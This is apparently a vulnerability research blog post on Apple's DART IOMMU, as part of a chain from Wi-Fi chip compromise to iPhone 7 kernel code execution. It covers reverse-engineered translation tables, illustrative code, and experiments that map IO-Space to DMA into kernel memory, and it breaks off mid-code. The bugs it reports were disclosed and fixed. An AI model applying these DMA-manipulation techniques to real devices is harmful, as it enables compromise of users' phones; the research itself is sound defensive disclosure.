
Over The Air - Vol. 2, Pt. 3: Exploiting The Wi-Fi Stack On Apple Devices

Posted by Gal Beniamini,

In this blog post we’ll complete our goal of achieving remote kernel code execution on the iPhone 7, by means of Wi-Fi communication alone.

After developing a Wi-Fi firmware exploit in the previous blog post, we are left with the task of using our newly acquired access to gain control over the XNU kernel. To this end, we’ll start by investigating the isolation mechanisms present on the iPhone. Next, we’ll explore the ways in which the host interacts with the Wi-Fi chip, identify several attack surfaces, and assess their corresponding security properties. Finally, we’ll discover multiple vulnerabilities and proceed to develop a fully-functional, reliable exploit for one of them, allowing us to gain control over the host’s kernel.


All the vulnerabilities presented in this blog post (#1, #2, #3, #4, #5, #6, #7) were reported to Apple and subsequently fixed in iOS 11. For an analysis of other affected devices in the Apple ecosystem, see the corresponding security bulletins.

Hardware Isolation

PCIe DMA


Broadcom’s Wi-Fi chips are present in a wide range of platforms, including mobile phones, IoT devices and Wi-Fi routers. To accommodate this variance, each chip must be sufficiently configurable, supporting several different interfaces for vendors wishing to integrate the chip into their platform. Indeed, Cypress’s data sheets include a wide range of supported interfaces, including PCIe, SDIO and USB.


While choosing the interface with which to integrate the chip may seem inconsequential, it can have far-ranging security implications. Each interface comes with different security guarantees, affecting the degree to which the peripheral may be “isolated” from the host. As we’ve already demonstrated how the Wi-Fi chip’s security can be subverted by remote attackers, it’s clear that providing isolation is crucial to sufficiently safeguarding the host.

From a security perspective, both SDIO and USB (up to 3.1) inherently offer some degree of isolation. SDIO solely enables the serial transfer of data between the host and the target device. Similarly, USB allows the transfer of “packets” between peripherals and the host. Broadly speaking, both interfaces can be thought of as facilitating an explicit communication channel between the host and the peripheral. All the data transported through these interfaces must be explicitly handled by either peer, by inspecting incoming requests and responding accordingly.

PCIe operates using a different paradigm. Instead of communicating with the host using a communication protocol, PCIe allows peripherals to gain Direct Memory Access (DMA) to the host’s memory. Using DMA, peripherals may autonomously prepare data structures within the host’s memory, only signalling the host (via a Message Signalled Interrupt) once there’s processing to be done. Operating in this fashion allows the host to conserve computing resources, as opposed to protocols that require processing to transfer data between endpoints or to handle each individual request.

Efficient as this approach may be, it also raises some challenges with regard to isolation. First and foremost, how can we be guaranteed that malicious peripherals won’t abuse this access in order to attack the host? After all, with full control over the host’s memory, subverting any program running on the host is trivial: peripherals may freely modify a program’s stack, alter function pointers, or overwrite code, all unbeknownst to the host itself.

Luckily, this issue has not gone unaddressed. Sufficient isolation for DMA-capable components can be achieved by partitioning the memory space visible to the peripheral using a dedicated hardware component: an I/O Memory Management Unit (IOMMU).


IOMMUs provide a memory translation service for peripherals, converting their addressable memory ranges (referred to as “IO-Space”) into ranges within the host’s Physical Address Space (PAS). Configuring the IOMMU’s translation tables allows the host to selectively control which portions of its memory are exposed to each peripheral, while safeguarding other ranges against potentially malicious access. Consequently, the bulk of the responsibility for providing sufficient isolation lies with the host.
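To make this contract concrete, here is a toy, page-granular IOMMU model. It is purely illustrative. The class name and its flat page map are our own invention, and the 4KB page size is an assumption. Real IOMMUs, including the one we meet below, use multi-level tables. What matters is the behaviour: the host decides which pages are exposed, and any access to an unexposed page faults instead of reaching host memory.

```cpp
#include <cassert>
#include <cstdint>
#include <map>
#include <optional>

// Toy page-granular IOMMU (illustrative only, not a real table format).
class ToyIommu {
public:
    static constexpr uint64_t kPageSize = 0x1000;  // assumed 4KB granule

    // Host side: expose one physical page at a given IO-Space page.
    void map(uint64_t iova, uint64_t phys) {
        assert(iova % kPageSize == 0 && phys % kPageSize == 0);
        pages_[iova] = phys;
    }

    // Host side: revoke the page containing `iova`.
    void unmap(uint64_t iova) { pages_.erase(iova & ~(kPageSize - 1)); }

    // Device side: translate an IO-Space address, or return nullopt
    // (a translation fault) if its page was never exposed.
    std::optional<uint64_t> translate(uint64_t iova) const {
        auto it = pages_.find(iova & ~(kPageSize - 1));
        if (it == pages_.end()) return std::nullopt;
        return it->second + (iova & (kPageSize - 1));
    }

private:
    std::map<uint64_t, uint64_t> pages_;  // IO-Space page -> physical page
};
```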

Returning to the issue at hand: as we are focusing on the Wi-Fi stack present within Apple’s ecosystem, an immediate question springs to mind. Which interface does Apple use to connect the Wi-Fi chip to the host? Inspecting the Wi-Fi firmware images present in several generations of Apple devices reveals that since the iPhone 6 (inclusive), Apple has opted for PCIe to connect the Wi-Fi chip to the host. Older models, such as the iPhone 5c and 5s, relied on a USB interface instead.


Due to the risks highlighted above, it is crucial that recent iPhones use an IOMMU to isolate themselves from potentially malicious PCIe-connected Wi-Fi chips. Indeed, during our previous research into the isolation mechanisms on Android devices, we discovered that no isolation was enforced in two of the most prominent SoCs, Qualcomm’s Snapdragon 810 and Samsung’s Exynos 8890. This allowed the Wi-Fi chip to freely access the host’s memory, leading to complete compromise of the device.

Inspecting the DMA Engine


To gain some visibility into the isolation capabilities present on the iPhone 7, we’ll start by exploring the Wi-Fi firmware itself. If some form of isolation is present, the memory ranges used by the Wi-Fi SoC to perform DMA operations and those used by the host would be disparate. Conversely, if we happen to find the same ranges of physical addresses, that would hint that no isolation is taking place.

Luckily, much of the complexity involved in reverse-engineering the firmware’s DMA functionality can be avoided, as Broadcom’s SoftMAC drivers (brcm80211) contain the bulk of the code used to interface with the SoC’s DMA engine.

Each DMA engine facilitates transfers in a single direction between two endpoints. One endpoint represents the Wi-Fi firmware. The other denotes either an internal core within the Wi-Fi SoC (such as when interacting with the RX or TX FIFOs) or the host itself. As we are interested in the memory ranges used for transfers originating in the Wi-Fi chip and terminating at the host, we must locate the DMA engine responsible for “dongle-to-host” memory transfers.

As it happens, this task is rather straightforward. Each “dma_info” structure in the firmware (representing a DMA engine) is prefixed by a pointer to a block of DMA-related function pointers stored in the firmware’s RAM. Since the block is placed at a fixed address, we can locate all instances of the structure by searching for that pointer within the firmware’s RAM. For each instance we come across, inspecting the “name” field encoded in the structure should allow us to deduce the identity of the DMA engine in question.
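The search itself amounts to a linear scan over a RAM dump. The sketch below assumes the firmware’s pointers are 32-bit little-endian words stored at 4-byte-aligned offsets. The function name is our own, and any pointer value you feed it (such as the one in the usage below) is hypothetical.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Returns every 4-byte-aligned offset in `ram` holding `value` as a
// little-endian 32-bit word (assumed pointer width for the firmware).
std::vector<size_t> find_pointer(const std::vector<uint8_t>& ram, uint32_t value) {
    std::vector<size_t> hits;
    for (size_t off = 0; off + 4 <= ram.size(); off += 4) {
        uint32_t word = uint32_t(ram[off]) | (uint32_t(ram[off + 1]) << 8) |
                        (uint32_t(ram[off + 2]) << 16) | (uint32_t(ram[off + 3]) << 24);
        if (word == value) hits.push_back(off);
    }
    return hits;
}
```

Each hit is a candidate “dma_info” structure. Its “name” field can then be read at whatever offset the structure layout dictates.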


Combining these two tidbits, we can quickly locate each DMA engine in the firmware’s RAM:


The first few instances clearly relate to internal DMA engines. The last instance, labelled “H2D”, indicates “host-to-dongle” memory transfers. Therefore, by elimination, the single remaining entry must correspond to transfers from the dongle to the host (sneakily left unnamed!).

Having located the engine, all that remains is to dump the RX descriptor ring and extract the addresses to which DMA transfers are performed. Unfortunately, descriptors are consumed shortly after being inserted into their rings, and their contents are replaced with generic placeholder values. Therefore, observing a non-consumed descriptor in a single memory snapshot is tricky. Instead, to extract “fresh” descriptors, we’ll insert a hook on the DMA transfer function, allowing us to dump descriptor addresses before they are inserted into the corresponding rings.

After inserting the hook, we are presented with the following output:


All of the descriptor addresses appear to be 32 bits wide...

How do the above addresses relate to our knowledge of the physical address space on the iPhone 7? The DRAM’s base address in the host’s physical address space is stored in the “gPhysBase” variable (in the kernel’s BSS). Reading this value from our research platform will allow us to determine whether the DMA descriptor addresses correspond to host-side physical ranges:


Ah-ha! The iPhone 7’s DRAM is based at 0x800000000, an address beyond the 32-bit range.
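The reasoning fits in a few lines. The sketch below decodes a descriptor using the 16-byte layout of struct dma64desc from the Linux brcmsmac driver. Whether the iPhone 7 firmware uses exactly this layout is an assumption. The sketch then compares the resulting address against the DRAM base read from gPhysBase.

```cpp
#include <cassert>
#include <cstdint>

// Layout assumed from Linux brcmsmac's struct dma64desc (fields shown in
// host byte order, i.e. after any little-endian conversion).
struct Dma64Desc {
    uint32_t ctrl1;     // control flags
    uint32_t ctrl2;     // buffer byte count, address extension
    uint32_t addrlow;   // buffer address, bits 31:0
    uint32_t addrhigh;  // buffer address, bits 63:32
};

uint64_t desc_address(const Dma64Desc& d) {
    return (uint64_t(d.addrhigh) << 32) | d.addrlow;
}

// DRAM base (gPhysBase) as observed on the iPhone 7.
constexpr uint64_t kDramBase = 0x800000000ULL;

// True if `addr` is at or above the DRAM base. Any address that fits in
// 32 bits fails this test, so it cannot be a raw host physical address.
bool reaches_dram(uint64_t addr) { return addr >= kDramBase; }
```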

Therefore, some form of conversion is taking place between the ranges visible to the Wi-Fi chip (IO-Space) and those corresponding to the host’s physical address space. To locate the root cause of this conversion, let’s shift our attention back towards the host.

DART


The host and the Wi-Fi chip communicate with one another using a protocol designed by Broadcom, dubbed “MSGBUF”. Using this protocol, both endpoints can transmit and receive control messages, as well as data traffic, through a set of “message rings”. Each ring is stored within the host’s memory, but is also made accessible to the firmware through DMA.

Since the rings must be accessible to the Wi-Fi chip through DMA, locating the code responsible for their initialisation might shed some light on how their physical addresses are converted into the DMA-accessible addresses we encountered in the firmware’s DMA descriptors.

Reverse-engineering AppleBCMWLANBusInterfacePCIe, we quickly arrive at the function responsible for initialising the IPC structures shared by the Wi-Fi chip and the host, including the aforementioned rings:

void* init_ring(void* this, uint64_t alignment, IOMapper* mapper, ...) {
    ...
    IOOptionBits options = kIOMemoryTypeVirtual | kIODirectionOutIn;
    IOBufferMemoryDescriptor* desc =
        IOBufferMemoryDescriptor::inTaskWithOptions(kernel_task,
                                                    options,
                                                    capacity,
                                                    alignment);
    ...
    IODMACommand* cmd = IODMACommand::withSpecification(
        IODMACommand::OutputLittle64,  //outSegFunc
        0,                             //numAddressBits
        0,                             //maxSegmentSize
        0,                             //mappingOptions
        0,                             //maxTransferSize
        1,                             //alignment
        mapper,                        //mapper
        0);                            //refCon
    ...
    cmd->setMemoryDescriptor(desc, true);
    ...
}
function 0xFFFFFFF006D1C074

As we can see above, the function uses I/O Kit APIs to allocate and map DMA-capable memory.

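Upon closer inspection, we can see that the IODMACommand is created with an explicit IOMapper instance (the “mapper” argument), which is presumably involved in translating the rings’ physical addresses. Therefore, we can proceed to extract the IOMapper instance and start tracing through its associated code paths.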

While the source code for IOMapper is available in the open-sourced portions of XNU, it does not perform any actual mapping operations. Instead, it delegates them to the “System Mapper”, a globally registered IOMapper instance. Since no concrete subclasses of IOMapper are present in the open-sourced portions of XNU, we can assume that a specialised subclass, containing the actual mapping implementation, exists in one of the proprietary KEXTs.

Indeed, following the extracted IOMapper’s virtual table, we arrive at the IODARTMapper class, under com.apple.driver.IODARTFamily. It seems a specialised IOMapper is used after all!

Before we go any further down the rabbit hole, let’s take a step back and assess the situation. According to Apple’s documentation, DART stands for “Device Address Resolution Table”. It is a hardware component integrated into the memory controller, whose purpose is to provide a separate address space mapping for 32-bit PCI peripherals. DART allows the system to map physical addresses beyond the 32-bit range to peripherals, and provides fine-grained control over the memory ranges exposed to each device. In short, this is none other than a proprietary IOMMU designed by Apple!

Digging deeper into IODARTMapper, we find iovmInsert, the entry point for inserting new IO-Space translations through a mapper. Passing through several more layers of indirection, we finally arrive at an instance of AppleS5L8960XDART.


The latter object originates in a different driver, com.apple.driver.AppleS5L8960XDART. It appears we’re getting closer to the bare-metal DART implementation for the SoC! Oddly, the driver references “S5L8960X”, the product code for the Apple A7 SoC (used in older iPhones, such as the 5s). Perhaps this artefact suggests that the same DART implementation has been used in prior SoC revisions.

Taking a closer look at AppleS5L8960XDART, we quickly come across a function of particular interest. This function performs many bit shifts and masks, much like we’d expect from translation-table management code. After spending some time familiarising ourselves with the code, we realise that the function is responsible for populating DART’s translation tables! Here is a high-level representation of the relevant code:

void* create_descriptors(void* this, uint64_t table_index,
                         uint32_t start_pfn, uint32_t map_size, ...) {

    ... //Validate input arguments, acquire mutex
    void** dart_table = ((void***)(this + 312))[table_index];
    uint32_t end_pfn  = start_pfn + map_size;

    //Populating each L0 descriptor in the range
    uint32_t l0_start_idx = (start_pfn >> 18) & 0x3;
    uint32_t l0_end_idx   = (end_pfn   >> 18) & 0x3;

    for (uint32_t l0_idx = l0_start_idx; l0_idx <= l0_end_idx; l0_idx++) {

        //Creating the L1 table if it doesn’t already exist
        struct l1_table_t* l1_table = (struct l1_table_t*)(dart_table[l0_idx]);
        if (!l1_table) {
            l1_table = allocate_l1_table(this);
            dart_table[l0_idx] = l1_table;
            uint64_t table_phys = l1_table->desc->getPhysicalSegment(...);
            uint64_t l0_desc = ((table_phys >> 12) & 0xFFFFFF) | 0x80000000;
            OSSynchronizeIO();
            set_l0_desc(this, table_index, l0_idx, l0_desc);
        }

        //Calculating the range of L1 descriptors to populate
        uint32_t l1_start_idx = (l0_idx == l0_start_idx) ?
                                     (start_pfn >> 9) & 0x1FF : 0;
        uint32_t l1_end_idx   = (l0_idx == l0_end_idx) ?
                                     (end_pfn   >> 9) & 0x1FF : 511;

        //Populating each L1 descriptor in the range
        for (uint32_t l1_idx = l1_start_idx; l1_idx <= l1_end_idx; l1_idx++) {

            //Creating the L2 table if it doesn’t already exist
            struct l2_table_t* l2_table;
            l2_table = (struct l2_table_t*)l1_table->l2_tables[l1_idx];
            if (!l2_table) {
                l2_table = allocate_l1_desc(this);
                l1_table->l2_tables[l1_idx] = l2_table;
                uint64_t table_phys = l2_table->desc->getPhysicalSegment(...);
                l1_table->descriptors[l1_idx] = (table_phys & 0xFFFFFF000) | 3;
                OSSynchronizeIO();
                ...
            }
        }
    }
    ... //Release mutex
}

struct l1_table_t {
    IOBufferMemoryDescriptor* desc;      //Descriptor holding the L1 table
    uint64_t* descriptors;               //Kernel VA ptr to L1 descs
    struct l2_table_t* l2_tables[512];   //L2 tables referenced by this table
};

struct l2_table_t {
    IOBufferMemoryDescriptor* desc;      //Descriptor holding the L2 table
    uint64_t* descriptors;               //Kernel VA ptr to L2 descs
    uint64_t unknown;
};
function 0xFFFFFFF0065978F0

Alright! Let’s take a moment to unpack the above function.

For starters, it appears that DART uses a 3-level translation regime. The first level holds up to 4 descriptors, while each subsequent level holds 512 descriptors. Since DART uses a 4KB translation granule, we can deduce the coverage of each level, working upwards. Each L2 table maps 0x200000 bytes (512 × 4KB) into IO-Space, while each L1 table maps up to 0x40000000 bytes (512 × 0x200000).
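The shifts in create_descriptors translate directly into an address decomposition. The sketch below applies them to a raw IO-Space address. The decompiled code does not show whether the page frame number is taken relative to the IO-Space base, so using the raw address is an assumption. The type and function names are our own.

```cpp
#include <cassert>
#include <cstdint>

// Table indices for one IO-Space address, using the same shifts as
// create_descriptors: pfn >> 18 picks one of 4 L0 entries, pfn >> 9 one of
// 512 L1 entries, and the low 9 pfn bits one of 512 L2 entries.
struct DartIndices {
    uint32_t l0, l1, l2, offset;
};

DartIndices split_iova(uint32_t iova) {
    uint32_t pfn = iova >> 12;  // 4KB granule
    return {(pfn >> 18) & 0x3, (pfn >> 9) & 0x1FF, pfn & 0x1FF, iova & 0xFFF};
}

// Bytes covered by a single entry at each level.
constexpr uint64_t kL2EntrySpan = 1ULL << 12;          // one 4KB page
constexpr uint64_t kL1EntrySpan = kL2EntrySpan * 512;  // one L2 table: 0x200000
constexpr uint64_t kL0EntrySpan = kL1EntrySpan * 512;  // one L1 table: 0x40000000
```

With 4 L0 entries of 0x40000000 bytes each, the hierarchy spans exactly a 32-bit IO-Space.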

In addition to the 3-level regime described above, DART holds 4 “base descriptors”. Unlike regular descriptors, these are not indexed by bits of the IO-Space address. Instead, they are referenced explicitly through a parameter provided by the caller (presumably the table_index argument above).

Drawing on our knowledge of PCIe, we can speculate on the nature of these “base descriptors”. Perhaps each DART can serve several different PCI peripherals on the same bus, where each “base descriptor” corresponds to one such device (based on the “Requester ID” encoded in the incoming TLP)? Whether or not this is the case, dumping the “base descriptors” of the DART instance corresponding to the Wi-Fi chip reveals that only the first descriptor is populated in our case.

In order to access DART’s mappings, two distinct sets of data structures are used in tandem. The first is a set of “convenience” structures, which map the translation hierarchy into high-level objects within the kernel’s virtual address space. The second holds the descriptors themselves, which are linked together by physical address. The former set is used by the kernel to conveniently locate and modify DART’s mappings, while the latter is used by DART’s hardware to perform the actual IO-Space translations.



Looking more closely at the descriptors, it appears that the translation format used by DART is proprietary, and does not match the formats present in the ARM VMSA (including those used by SMMUs). Nonetheless, we can deduce the descriptors’ composition by inspecting the code above, which constructs and populates descriptors across the translation hierarchy.

L0 descriptors encode the physical frame number (using a 4KB translation granule) of the next-level table in their lower 24 bits, and set bit 31 (0x80000000) to denote a valid entry. L1 and L2 descriptors, on the other hand, use the bottom two bits to denote validity. Setting both bits denotes a valid entry; other combinations result in translation faults. Their upper bits store the physical address of either the next translation table or the 4KB region mapped into IO-Space.
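Written out as helpers, the inferred formats look as follows. These encodings are reconstructed from the decompiled create_descriptors and are not documented by Apple. The masks are copied from that code, and the function names are our own.

```cpp
#include <cassert>
#include <cstdint>

// L0: next-table PFN in the low 24 bits, bit 31 set for a valid entry.
constexpr uint64_t kL0Valid = 0x80000000ULL;

uint64_t make_l0_desc(uint64_t table_phys) {
    return ((table_phys >> 12) & 0xFFFFFF) | kL0Valid;
}
bool l0_valid(uint64_t desc) { return (desc & kL0Valid) != 0; }
uint64_t l0_next_table(uint64_t desc) { return (desc & 0xFFFFFF) << 12; }

// L1/L2: physical address in bits 35:12, both low bits set for a valid
// entry; any other low-bit combination is treated as a fault.
uint64_t make_l12_desc(uint64_t phys) { return (phys & 0xFFFFFF000ULL) | 3; }
bool l12_valid(uint64_t desc) { return (desc & 3) == 3; }
uint64_t l12_target(uint64_t desc) { return desc & 0xFFFFFF000ULL; }
```

Note that both formats top out at 36-bit physical addresses (24 bits of PFN plus the 12-bit page offset). That is comfortably enough to reach DRAM based at 0x800000000.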


Lastly, we must deduce IO-Space’s base address to complete our analysis of DART’s translation format. Recall the IO-Space addresses we encountered earlier in the Wi-Fi firmware’s DMA descriptors: all of them appeared to be based at 0x80000000. As such, it seems a fair assumption that the Wi-Fi chip’s IO-Space mappings start at that address.

Combining all of the information above, let’s build a module in our research platform to interact with the DART instance. The module will analyse DART’s translation tables, following the hierarchy described above. By analysing the translation tables, we can obtain a mapping between IO-Space addresses and their corresponding physical ranges within the host’s PAS. Furthermore, we can invert the tables in order to create a PAS to IO-Space mapping. Using these two mappings, we can convert IO-Space addresses to physical addresses, and vice versa.
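A minimal sketch of such a walk follows. It is not our research platform’s actual code. It makes three assumptions: the 4 L0 descriptors have already been read out, L1 and L2 descriptors are 8 bytes each, and each level’s index comes directly from IO-Space address bits 31:30, 29:21 and 20:12, as the shifts in create_descriptors suggest. `PhysRead64` is a hypothetical stand-in for whatever primitive reads host physical memory.

```cpp
#include <cassert>
#include <cstdint>
#include <functional>
#include <map>

// Hypothetical physical-memory read primitive: returns the 64-bit word
// at a host physical address.
using PhysRead64 = std::function<uint64_t(uint64_t)>;

struct DartMaps {
    std::map<uint64_t, uint64_t> io_to_phys;  // IO-Space page -> physical page
    std::map<uint64_t, uint64_t> phys_to_io;  // inverse (last IO page wins)
};

DartMaps walk_dart(const uint64_t l0[4], const PhysRead64& read64) {
    DartMaps out;
    for (uint64_t i0 = 0; i0 < 4; i0++) {
        if (!(l0[i0] & 0x80000000ULL)) continue;          // L0 valid bit
        uint64_t l1_base = (l0[i0] & 0xFFFFFF) << 12;
        for (uint64_t i1 = 0; i1 < 512; i1++) {
            uint64_t d1 = read64(l1_base + i1 * 8);
            if ((d1 & 3) != 3) continue;                  // L1 valid bits
            uint64_t l2_base = d1 & 0xFFFFFF000ULL;
            for (uint64_t i2 = 0; i2 < 512; i2++) {
                uint64_t d2 = read64(l2_base + i2 * 8);
                if ((d2 & 3) != 3) continue;              // L2 valid bits
                uint64_t iova = (i0 << 30) | (i1 << 21) | (i2 << 12);
                uint64_t phys = d2 & 0xFFFFFF000ULL;
                out.io_to_phys[iova] = phys;
                out.phys_to_io[phys] = iova;
            }
        }
    }
    return out;
}
```

Keeping the inverse in a plain map is a simplification. If two IO-Space pages alias the same physical page, only the last one walked is recorded.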

Finally, in addition to inspecting IO-Space, our DART module also allows us to manipulate it, by introducing new IO-Space mappings pointing at whichever physical address we desire.

At long last, we can test whether our deductions regarding DART’s structure are indeed valid. First, let’s extract the DART instance corresponding to the Wi-Fi chip. Then, using this object, we can proceed to dump the entire mapping between IO-Space addresses and their corresponding physical ranges by following DART’s translation hierarchy:


Great! The first few mappings appear sane: each IO-Space address is translated into a physical address well within the host’s PAS. Moreover, our assumption regarding DART’s translation granule seems to hold, as some mapped physical addresses lie within a 4KB range of one another.

To be absolutely sure that our assessment is valid, let’s perform another short experiment. We’ll map in an unused IO-Space address, pointing it at a physical address corresponding to “spare” data within the kernel’s BSS. Next, using the DMA hook we inserted previously, we’ll point unconsumed DMA descriptors at the newly mapped IO-Space address. By doing so, subsequent DMA transfers should land at our chosen BSS address.

After inserting the hook and monitoring the mapped BSS range (by reading it through the kernel’s VAS), we are presented with the following result:


Awesome! We managed to DMA into an arbitrary physical address within the kernel’s BSS, confirming that our understanding of DART is correct.

Exploring DART


Using our newly acquired control over IO-Space, we can proceed to conduct a few experiments.

For starters, it would be interesting to see whether the kernel integrity mechanisms present on the iPhone 7 (“KTRR”, previously referred to as “AMCC”) still hold in the presence of malicious DMA attempts from the Wi-Fi chip. To find out, we’ll map each of the protected physical ranges (the kernel’s code segments, read-only segments, etc.) into IO-Space, insert the DMA hook, and observe their contents to see whether they were successfully modified.

Unsurprisingly, each attempt to DMA into a protected region results in a fault being raised, which triggers a kernel panic and crashes the device. Attempting to DMA into KTRR’s hardware registers, which store the protected region ranges, similarly fails: once lockdown occurs, no modification of the registers is permitted.


Continuing our analysis of DART, let’s consider another edge case: assume two consecutive IO-Space mappings point to non-contiguous ranges of physical memory. In such a case, should DMA operations crossing the boundary between the two IO-Space ranges be permitted? If so, should the data be split across the corresponding physical ranges? Or should the transfer instead only use the first physical range?

To find out, we’ll conduct another experiment. First, we’ll create two IO-Space mappings pointing at disparate regions in the kernel’s BSS. Then, using the DMA engine, we’ll initiate a transfer crossing the boundary between the two IO-Space ranges.


Running the above experiment and monitoring the resulting addresses through the kernel’s VAS, we are presented with a positive result. DART correctly splits the transaction across the two corresponding physical ranges, never exceeding the bounds of either mapped-in region.
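The observed behaviour can be modelled in a few lines. The sketch below is a model of what we saw, not DART’s implementation. A transfer is cut at 4KB page boundaries, and each piece lands at its own page’s physical target. Treating an unmapped page as an aborting fault is our assumption, and the exception simply stands in for it.

```cpp
#include <algorithm>
#include <cassert>
#include <cstdint>
#include <map>
#include <stdexcept>
#include <vector>

struct PhysChunk {
    uint64_t phys;
    uint64_t len;
};

// Splits an IO-Space transfer [iova, iova + len) into per-page physical
// pieces using an IO-Space page -> physical page map.
std::vector<PhysChunk> split_transfer(const std::map<uint64_t, uint64_t>& io_to_phys,
                                      uint64_t iova, uint64_t len) {
    constexpr uint64_t kPage = 0x1000;
    std::vector<PhysChunk> chunks;
    while (len > 0) {
        uint64_t page = iova & ~(kPage - 1);
        uint64_t off = iova - page;
        uint64_t n = std::min(len, kPage - off);  // never cross a page boundary
        auto it = io_to_phys.find(page);
        if (it == io_to_phys.end()) throw std::runtime_error("DART translation fault");
        chunks.push_back({it->second + off, n});
        iova += n;
        len -= n;
    }
    return chunks;
}
```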

So far, so good.

PCIe Configuration Space


Continuing our investigation of DART, we arrive at another question: how does DART perform context determination? Namely, how does DART differentiate between the components issuing memory access requests?

Depending on DART’s architecture, several answers to this question exist. If each DART is assigned to a single component or a single PCIe bus, no identification is needed, as it can simply funnel all operations from that source through its translation mechanism. Alternatively, if several PCIe components exist on the bus to which DART is assigned, it could use the “Requester ID” (RID) field in the PCIe TLP to identify the originating component.

Using the RID for context determination is not risk-free, as malicious PCIe components may attempt to “spoof” the contents of their TLPs. To deal with such scenarios, PCIe introduced Access Control Services (ACS), allowing PCIe switches to make routing decisions, including disallowing the transfer of certain TLPs based on the IDs they carry. As we are not aware of the PCIe topology on the iPhone, it remains unknown whether such a configuration is needed (or used).

With regard to control over PCIe TLPs, Broadcom’s Wi-Fi chips expose much of the PCIe core’s functionality to the Wi-Fi firmware by mapping the core’s registers at a fixed backplane address. Previous Broadcom SoC revisions, which incorporated PCIe Gen 1 cores, allowed access to several “diagnostic” registers (via pcieindaddr / pcieinddata), which govern the physical (PLP), data link (DLLP) and transaction (TLP) layers of PCIe. Regardless, it is unknown whether this mechanism allows modification of the RID, or indeed whether this form of access is still present in current-gen Broadcom hardware.

Nevertheless, standardised PCIe mechanisms exist which may also affect the RID’s composition. For instance, PCIe 3.0 introduced Alternate Routing-ID Interpretation (ARI), which modifies the encoding of the RID, eliminating the “device” field while expanding the “function” field to 8 bits.
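The two RID encodings differ only in how the low byte is split. The sketch below follows the standard PCIe layout: bus in bits 15:8, then device in bits 7:3 and function in bits 2:0, or, under ARI, an 8-bit function in bits 7:0. The type and function names are our own.

```cpp
#include <cassert>
#include <cstdint>

struct Rid {
    uint8_t bus;
    uint8_t device;    // always 0 under ARI
    uint8_t function;
};

// Decodes a 16-bit PCIe Requester ID, with or without ARI.
Rid decode_rid(uint16_t rid, bool ari) {
    uint8_t bus = rid >> 8;
    if (ari) return {bus, 0, uint8_t(rid & 0xFF)};
    return {bus, uint8_t((rid >> 3) & 0x1F), uint8_t(rid & 0x7)};
}
```

The same 16 bits can therefore name different requesters depending on whether ARI is enabled. This is why the feature is interesting from the firmware’s point of view.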


While the PCIe Configuration Space is usually accessed through the host, Broadcom’s Wi-Fi SoC also exposes it within the Wi-Fi SoC, through a pair of backplane registers belonging to the PCIe core (configaddr / configdata). Using these registers, the Wi-Fi firmware can not only read the PCIe Configuration Space, but also modify values within it. Like many advanced PCIe features, ARI is exposed in the configuration space through an “extended capability” blob. Therefore, if ARI is supported by the PCIe core, we could use our access to the configuration space to enable the feature from the Wi-Fi firmware.

To determine whether such capabilities are present in the PCIe core, we’ll create a dump of the configuration space (using the aforementioned register pair). After doing so, we can simply reorganise the contents into a format legible to lspci and instruct it to parse the data, producing a human-readable representation of the features supported by the PCIe core:
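As a complement to lspci, the same question can be answered by walking the extended capability list directly. The sketch below follows the standard layout. The list starts at offset 0x100, and each 32-bit header holds the ID in bits 15:0, the version in bits 19:16 and the next offset in bits 31:20. ARI’s extended capability ID is 0x000E. The input is assumed to be a 4KB dump gathered through configaddr / configdata, and the function names are our own.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

constexpr uint16_t kExtCapAri = 0x000E;

uint32_t read_le32(const std::vector<uint8_t>& cfg, uint32_t off) {
    return uint32_t(cfg[off]) | (uint32_t(cfg[off + 1]) << 8) |
           (uint32_t(cfg[off + 2]) << 16) | (uint32_t(cfg[off + 3]) << 24);
}

// Returns the offset of the extended capability `id`, or 0 if absent.
uint32_t find_ext_cap(const std::vector<uint8_t>& cfg, uint16_t id) {
    uint32_t off = 0x100;
    // Bound the walk so a malformed list cannot loop forever.
    for (int i = 0; i < 1024 && off >= 0x100 && off + 4 <= cfg.size(); i++) {
        uint32_t hdr = read_le32(cfg, off);
        if (hdr == 0 || hdr == 0xFFFFFFFF) break;  // no (more) capabilities
        if ((hdr & 0xFFFF) == id) return off;
        off = (hdr >> 20) & 0xFFC;                 // next pointer, dword-aligned
        if (off == 0) break;                       // end of list
    }
    return 0;
}
```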


Scanning through the above capabilities, it appears that none of the “advanced” PCIe features (such as ARI) are supported by the PCIe core.

Exploring IO-Space


While we’ve already determined how DART facilitates the IO-Space mapping for the Wi-Fi chip, we have yet to investigate the contents of the memory exposed through this mechanism. To do so, we’ll use a two-stage translation process. First, we’ll use our DART module to create a mapping between IO-Space addresses and their corresponding physical ranges. Once we obtain the mapped physical ranges, all that remains is to map them into the kernel’s VAS, allowing us to dump their contents using our research platform.

As we know, the mapping from virtual to physical addresses is governed by the MMU’s translation tables. On ARMv8-A platforms (such as the iPhone 7), the ARM Virtual Memory System Architecture (VMSA) specifies the format of the translation tables used by the MMU. Like any XNU task, the kernel’s translation tables are accessible through its task_t structure (exported through the kernel’s data segment). Following the entries in the task structure, we arrive at its pmap, which holds the translation tables.

Putting the two together, we can write some code in our research framework to locate the kernel’s task, extract its translation tables, and encapsulate the information therein in a module representing an ARMv8 translation table.

Using our new module, we can now translate virtual addresses in the kernel’s VAS into physical ones. Furthermore, we can invert the translation table, producing a (one-to-many) mapping from physical to virtual addresses. Combined with our DART module, this allows us to take each IO-Space address, convert it to a physical address, and then use the inverted translation table to convert it back to a virtual address in the kernel’s VAS.
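The two-stage lookup can be sketched as follows. `VaMapping` is a hypothetical record for one leaf mapping produced by walking the kernel’s ARMv8 tables, and the kernel’s page size is left as a parameter rather than assumed. DART’s 4KB granule is hard-coded in the first stage. Several virtual addresses may alias one physical page, hence the one-to-many result.

```cpp
#include <cassert>
#include <cstdint>
#include <map>
#include <vector>

// One leaf mapping from a kernel translation-table walk (hypothetical type).
struct VaMapping {
    uint64_t va, pa, size;
};

// Inverts VA -> PA leaf mappings into a PA page -> [VA page] index.
std::map<uint64_t, std::vector<uint64_t>> invert(const std::vector<VaMapping>& maps,
                                                 uint64_t page) {
    std::map<uint64_t, std::vector<uint64_t>> out;
    for (const auto& m : maps)
        for (uint64_t off = 0; off < m.size; off += page)
            out[m.pa + off].push_back(m.va + off);
    return out;
}

// IO-Space -> physical (via the DART mapping) -> every kernel VA aliasing it.
std::vector<uint64_t> io_to_kva(uint64_t iova,
                                const std::map<uint64_t, uint64_t>& io_to_phys,
                                const std::map<uint64_t, std::vector<uint64_t>>& pa_to_va,
                                uint64_t page) {
    std::vector<uint64_t> out;
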